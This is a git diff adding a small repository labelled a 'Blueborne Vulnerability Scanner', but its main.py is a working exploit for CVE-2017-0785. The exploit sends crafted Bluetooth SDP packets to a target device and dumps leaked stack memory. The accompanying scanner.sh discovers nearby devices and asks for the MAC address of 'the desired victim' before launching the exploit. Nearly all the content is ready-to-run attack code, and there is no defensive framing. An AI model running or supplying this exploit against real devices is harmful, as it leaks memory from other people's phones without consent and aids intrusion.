Files Added

3 files changed, 62 insertions, 0 deletions

diff --git a/README.md b/README.md
new file mode 100644
index 0000000..9831cc3
--- /dev/null
+++ b/README.md
@@ -0,0 +1 @@
+# Blueborne-Vulnerability-Scanner
diff --git a/main.py b/main.py
new file mode 100644
index 0000000..9e861e7
--- /dev/null
+++ b/main.py
@@ -0,0 +1,53 @@
+from pwn import *
+import bluetooth
+
+if not 'TARGET' in args:
+    log.info("Usage: CVE-2017-0785.py TARGET=XX:XX:XX:XX:XX:XX")
+    exit()
+
+target = args['TARGET']
+service_long = 0x0100
+service_short = 0x0001
+mtu = 50
+n = 30
+
+def packet(service, continuation_state):
+    pkt = '\x02\x00\x00'
+    pkt += p16(7 + len(continuation_state))
+    pkt += '\x35\x03\x19'
+    pkt += p16(service)
+    pkt += '\x01\x00'
+    pkt += continuation_state
+    return pkt
+
+p = log.progress('Exploit')
+p.status('Creating L2CAP socket')
+
+sock = bluetooth.BluetoothSocket(bluetooth.L2CAP)
+bluetooth.set_l2cap_mtu(sock, mtu)
+context.endian = 'big'
+
+p.status('Connecting to target')
+sock.connect((target, 1))
+
+p.status('Sending packet 0')
+sock.send(packet(service_long, '\x00'))
+data = sock.recv(mtu)
+
+if data[-3] != '\x02':
+    log.error('Invalid continuation state received.')
+
+stack = ''
+
+for i in range(1, n):
+    p.status('Sending packet %d' % i)
+    sock.send(packet(service_short, data[-3:]))
+    data = sock.recv(mtu)
+    stack += data[9:-3]
+
+sock.close()
+
+p.success('Done')
+
+print hexdump(stack)
+
diff --git a/scanner.sh b/scanner.sh
new file mode 100644
index 0000000..485db04
--- /dev/null
+++ b/scanner.sh
@@ -0,0 +1,8 @@
+#!/bin/bash
+hcitool scan
+echo "Enter The Mac Adress of the desired victim"
+read targer
+clear
+echo "Scanning"
+clear
+python main.py TARGET=$targer